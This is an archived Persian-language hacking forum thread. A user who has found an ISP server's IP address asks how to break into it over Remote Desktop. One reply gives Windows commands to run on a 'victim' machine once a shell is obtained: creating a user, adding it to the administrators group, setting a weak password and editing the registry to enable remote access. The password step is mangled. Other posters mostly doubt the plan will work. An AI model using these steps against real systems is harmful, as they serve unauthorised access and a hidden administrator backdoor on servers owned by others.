ايران ويج

نسخه‌ی کامل: وارد شدن به سرور ISP از طریق ریموت دسکتاپ
شما در حال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب بندی مناسب.
سلام دوستان بعد از پیدا کردن آیپی سرور ISP حالا می خوام به وسیله ریموت دسکتاپ به اون وصل بشم اما برای این کار لازمه که از قبل یک یوزر در سرور ایجاد کنیم Sad کی می دونه چطور میشه این کار رو کردAmaze
از دستور Net User استفاده کن البته از طریق داس
Whistle خوب بله درسته اما باید قبلش ازش شل بگیرم همینجوری که نمیشه Sad
اگه میتونستم شل بگیرم که دیگه مشکلی نبووووود Wink
بابا تو دیگه چقدر باهوشی مواظب باش نبرنت

دست شما درد نکنه از این تیکه ای که به ما پروندی کاش به جای این یکم راهنماییم میکردی !!!!
حسین جان به دل نگیر با من بودن Wink

اهان

من یه اشتباهی که کردم دقت نکردم که نوشتی ISP فک کردم برا شبکه میخوای

برا این بیخیال شی بهتره
ه یه مقاله راجع به وصل شدن به ISP با HyperTerminal تو سایت بود ولی با اونم فقط میشه یه سری اطلاعات غیر مفید گرفت اما نمیدونم مقاله تو کدوم قسمت هست

Wink
با با شما چقدر با هوشيد واسه اين كار بايد يوزر سطح بالا داشت حال كو يوزر سطح بالا
خوب نمیشه یه جوری این یوزر سطح بالا رو ساخت ؟
سلام دوست عزیز اگر شل دارید با شل می تونید یک یوزر وپسورد درست کنید اگر به cmd سیستم قربانی commandدسترسی دارید با این دستور می تونید یک یوزر بسازید در سطح ادمین
net user ali /add مرحله اول
اگر یوزر ساخته بشه پیام زیر را می دهد
The command completed successfully
حالا می خواهیم این یوزر را به سطح ادمین برسانیم از دستور زیر استفاده می کنیم
net localgroup administrators ali /add مرحله دوم
اگر یوزر ساخته بشه پیام زیر را می دهد

مر حله آخر net user ali 123456 /add
ما در این جا یوزر علی را ساختیم با پسورد123456
حالا با ریموت دسکتاپ ریموت کنید اگه ریموت دسکتاپ غیر فعال بود با این دستور فعال کنید ابتدا وارد cmd سیستم قربانی شوید و این دستور را وارد کنید
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 0x01 /f
حالا اینتر بزنید اگه فعال بشه پیام زیر را می دهد
ممنون اما به تاریخ پست قبلی توجه کنید !
دوست عزیز معمولا ریموت دسکتاپ رو disable میکنن تو سرورا و دسترسی ها رو هم میبندن
مگه اینکه خیلی لگن باشه اون isp!!!!